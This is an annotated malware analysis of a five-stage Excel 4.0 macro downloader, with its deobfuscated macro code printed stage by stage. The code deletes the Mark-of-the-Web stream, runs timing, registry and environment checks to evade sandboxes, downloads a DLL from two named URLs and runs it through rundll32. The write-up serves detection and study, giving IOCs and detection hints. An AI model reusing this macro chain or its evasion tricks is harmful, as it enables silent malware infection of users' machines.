This multi-stage XLM (Excel 4.0 macro) workbook downloads its final payload (a DLL run through rundll32 in stage 5) only if the workbook itself carries a `:Zone.Identifier` stream, i.e. it was downloaded from the internet, and one of two download URLs is reachable. It contains anti-analysis tricks, such as verifying that WAIT really slept for the requested time, and it removes origin artifacts from the workbook itself, such as the Zone.Identifier (Mark-of-the-Web) stream. The results of its environment checks are written into cells that serve as key bytes for decoding the next stage, so a check result that differs from what the author expected produces garbage instead of the next stage rather than an explicit exit.
SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview
- Stage 1: the entry-point stage. `FORMULA(crack, ...)` (cell C72) is the key cell that creates the next stage: it assembles the text of one stage-2 formula from the cells of column 18+pound (up to the end-of-line marker) and writes it as a live formula into R79C3 and the following rows.
C51 pound=(VALUE("0")) ' Stage-1 loader: pound selects both the source column (18+pound) and the destination row (R79C3 offset pound-1) of each stage-2 formula
C52 =WHILE(pound<30) ' 30 iterations -> 30 stage-2 formulas, written to R79C3..R108C3
C55 =COUNT(R46C3:R85C10) ' result is not referenced by any visible cell; apparently filler
C56 arrivals=-1 ' row cursor of the inner read loop, pre-incremented at C64 (first row read is 56)
C60 pound=pound+1
C61 crack="" ' accumulator for the formula text of the current stage-2 line
C63 =WHILE(arrivals<196) ' walk down column 18+pound (columns 19..48), rows 56..252 at most, until the marker is hit
C64 arrivals=arrivals+1
C65 =INDIRECT(ADDRESS(arrivals+56,18+pound)) ' read the cell at (row arrivals+56, column 18+pound); value lands in R65C3
C66 =IF(R65C3="ikhTQSvvltISB",SET.NAME("arrivals",196),SET.NAME("crack",crack&R65C3)) ' "ikhTQSvvltISB" is the end-of-line marker: force the loop to exit; otherwise append the fragment to crack
C68 =NEXT()
C72 =FORMULA(crack,ABSREF("R["&(pound-1)&"]C[0]",R79C3)) ' emit the assembled text as a live formula at R79C3 + (pound-1) rows: this builds the stage-2 macro body
C73 =COUNT(R28C1:R75C2) ' result is not referenced by any visible cell; apparently filler
C74 ' empty cell
C75 =NEXT()
- Stage 2: `FORMULA(competent, ...)` is the key cell that creates the next stage. `competent` is built one CHAR at a time by subtracting a rotating key (`cookies`) from the numeric cells read via INDIRECT from Sheet1; a value above 1000 ends a line. The decoder routine (`attacked`) is reused by every later stage with different `loads`/`instruction`/`cookies`/`bottom`/`positions` parameters.
[=GOTO(R102C3)] ' jump to `[attacked=R80C3]`: the parameters (R102C3..R107C3) are set first, then the decoder routine at R80C3 is called
[bench=0] ' entry of the `attacked` routine: key-stream index, global across output lines (not reset per line)
[athletes=0] ' output line counter (1..bottom)
[grove=ROWS(cookies)] ' key length = number of cells in cookies
[=WHILE(athletes<bottom)] ' one iteration per decoded formula line
[ticket=-1] ' column-read cursor, pre-incremented below
[athletes=athletes+1]
[competent=""] ' accumulator for the decoded formula text of this line
[=WHILE(ticket<500)] ' walk down one Sheet1 column until a terminator value is found (at most 501 cells)
[ticket=ticket+1]
[=INDIRECT(ADDRESS(ticket+loads,athletes+instruction,,,"Sheet1"))] ' read the encoded value at Sheet1 row ticket+loads, column athletes+instruction; lands in R89C3
[=IF(R89C3>1000)] ' values above 1000 terminate the current line
[ticket=500]
[=ELSE()]
[healthy=MOD(bench,grove)+1] ' 1-based index into the rotating key
[volunteers=INDEX(cookies,healthy)] ' current key byte
[bench=bench+1]
[competent=competent&CHAR(R89C3-volunteers)] ' decode: character = encoded value minus key byte
[=END.IF()]
[=NEXT()]
[=FORMULA(competent,ABSREF("R["&(athletes-1)&"]C[0]",positions))] ' write the decoded text as a live formula at positions + (athletes-1) rows
[=NEXT()]
[=RETURN()]
[attacked=R80C3] ' name the decoder routine (entry = `[bench=0]`) so later stages can call it with new parameters
[loads=99] ' Sheet1 row base: the first encoded row is 100
[instruction=5] ' Sheet1 column base: stage-3 data sits in columns 6..22
[cookies=R68C11:R77C11] ' 10-cell key for stage 3 (this formula ends with :R77C11)
[bottom=17] ' stage 3 is 17 formula lines
[positions=R109C3] ' stage 3 is written to R109C3..R125C3
[=attacked()] ' back to [bench=0]: run the decoder
- Stage 3: re-uses the `attacked()` routine; the formula variable is still `competent`. The key for the next decode (`cookies`) becomes R78C11:R82C11, whose values are produced by the anti-analysis checks below, so stage 4 only decodes correctly in an environment that yields the expected check results.
[=FORMULA(INT(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."))+-309,R78C11)] ' ALERT should return TRUE, INT(TRUE) = -1 (NOTE(review): INT(TRUE) normally evaluates to 1 in Excel - confirm which value the decoder expects); the result becomes key byte 1 (R78C11) for stage 4; the fake "corrupt" dialog needs a click, so a headless sandbox may stall here
R110C3: [=ERROR(TRUE,R112C3)] ' install an error handler cell R112C3
R111C3: [=FORMULA(INT(FILE.DELETE(GET.DOCUMENT(2)&"\"&GET.WINDOW(31)&":Zone.Identifier"))+56,R79C11)] ' delete extended stream :Zone.Identifier (Mark-of-the-Web) of the workbook itself, which will be created by browser if the file is downloaded from the internet; result becomes key byte 2 (R79C11)
R112C3: [=IF(ISERROR(R111C3),CLOSE(FALSE),)] ' if not downloaded from internet (no ADS, so FILE.DELETE errors) it will CLOSE the file and wont move forward, this is why it cannot be caught in an offline environment; to analyse dynamically, add a :Zone.Identifier stream to the sample before opening it
[=FORMULA(INT(CALL("Xlcall32","Excel4","2JRJRR#",4,,2,288,65)=353)+-656,R80C11)] ' Xlcall32.Excel4(4, 288, 65) invoke excel function SUM(288, 65), got 353; result becomes key byte 3 (R80C11)
[=APP.MAXIMIZE()]
[=FORMULA(INT(AND(ISNUMBER(SEARCH("Win",GET.WORKSPACE(1))),GET.WORKSPACE(14)>390,GET.WORKSPACE(42),GET.WORKSPACE(19),GET.WORKSPACE(13)>800))+316,R81C11)] ' environment checks -> key byte 4 (R81C11): GET.WORKSPACE(1) platform name contains "Win"; (14)/(13) commonly documented as usable window height/width, (42) sound capability, (19) mouse present - confirm against the XLM reference
[=NOW()] ' R116C3: timestamp before WAIT
[=WAIT(NOW()+"00:00:01")]
[=NOW()] ' R118C3: a well known XLM trick NOW(); WAIT(); NOW(), subtract to ensure WAIT really happened
[=FORMULA(INT((R118C3-R116C3)*100000>1)+320,R82C11)] ' key byte 5 (R82C11): NOW() is in days, so 1 s = 1/86400 ~ 1.16e-5 and x100000 ~ 1.16 > 1 only if the wait really elapsed
[loads=99] ' parameters for the next attacked() call
[instruction=22] ' stage-4 data sits in Sheet1 columns 23..46
[cookies=R78C11:R82C11] ' key = the five check results above; a wrong environment yields a garbage stage 4
[bottom=24] ' stage 4 is 24 formula lines
[positions=R126C3] ' stage 4 is written to R126C3..R149C3
[=attacked()]
- Stage 4: writes a 7746-byte random file, exports the Excel `Security` registry key with `reg.exe EXPORT` and checks the export for `VBAWarnings=1`; both results become key bytes (R83C11, R84C11) for decoding stage 5.
[p="C:\Users\Public\Documents\"] ' working directory for all dropped files (IOC: wa4.txt, icSz4h.txt, f4myZ.txt in C:\Users\Public\Documents\)
[=FOPEN(p&"wa4.txt",3)] ' create/overwrite wa4.txt; file handle in R127C3
[=WHILE(FSIZE(R127C3)<7746)]
[=FWRITE(R127C3,CHAR(RANDBETWEEN(33,125)))] ' fill with random printable characters until 7746 bytes
[=NEXT()]
[=FORMULA(INT(FSIZE(R127C3)=7746)+29,R83C11)] ' key byte 6 (R83C11): TRUE only if the file reached exactly 7746 bytes, i.e. the write succeeded
[=FCLOSE(R127C3)] ' note: wa4.txt is left on disk
[="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&p&"icSz4h.txt /y"] ' reg.exe arguments: export the macro-security key of the running Office version to icSz4h.txt; stored in R133C3
[=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R133C3,0,5)] ' spawn reg.exe from Excel (detection: excel.exe -> reg.exe EXPORT ...\Excel\Security)
[=WHILE(ISERROR(FILES(p&"icSz4h.txt")))] ' poll until the export file exists (reg.exe runs asynchronously)
[=WAIT(NOW()+"00:00:01")]
[=NEXT()]
[=FOPEN(p&"icSz4h.txt")] ' file handle in R138C3
[=FPOS(R138C3,215)] ' seek to offset 215 (presumably past the .reg header)
[=FREAD(R138C3,255)] ' read 255 characters into R140C3
[=FCLOSE(R138C3)]
[=FILE.DELETE(p&"icSz4h.txt")] ' remove the export; only wa4.txt remains as an artifact
[=FORMULA(INT(ISNUMBER(SEARCH("""VBAWarnings""=dword:00000001",R140C3)))+301,R84C11)] ' key byte 7 (R84C11): whether macro security is "Enable all macros" (VBAWarnings=1, a common sandbox setting); which value the real stage 5 expects cannot be told from the listing
[loads=99]
[instruction=46] ' stage-5 data sits in Sheet1 columns 47..55
[cookies=R78C11:R84C11] ' key = all seven check results
[bottom=9] ' stage 5 is 9 formula lines
[positions=R150C3] ' stage 5 is written to R150C3..R158C3
[=attacked()]
- Stage 5: downloads the payload from one of two URLs into `C:\Users\Public\Documents\f4myZ.txt`, executes it as a DLL with `rundll32.exe ... f4myZ.txt,DllRegisterServer`, then closes the workbook without saving.
[zzz="https://hrdgschool.com/logs.php"] ' primary payload URL (IOC)
[xxx="https://allied-almansoor.com/logs.php"] ' fallback payload URL (IOC)
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,zzz,p&"f4myZ.txt",0,0)] ' download to C:\Users\Public\Documents\f4myZ.txt; HRESULT lands in R152C3 (0 = success)
[=IF(R152C3<>0,,GOTO(R155C3))] ' on success skip the fallback download (jump to `[a="ShellExecuteA"]`); on failure fall through to it
[=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,xxx,p&"f4myZ.txt",0,0)] ' fallback download; its result is not checked
[a="ShellExecuteA"] ' R155C3
[b="C:\Windows\system32\rundll32.exe"]
[=CALL("Shell32",a,"JJCCCJJ",0,"open",b,p&"f4myZ.txt,DllRegisterServer ",0,5)] ' run the downloaded file as a DLL via rundll32 <path>\f4myZ.txt,DllRegisterServer (detection: rundll32 loading a .txt from Public\Documents, parent excel.exe)
[=CLOSE(FALSE)] ' close the workbook without saving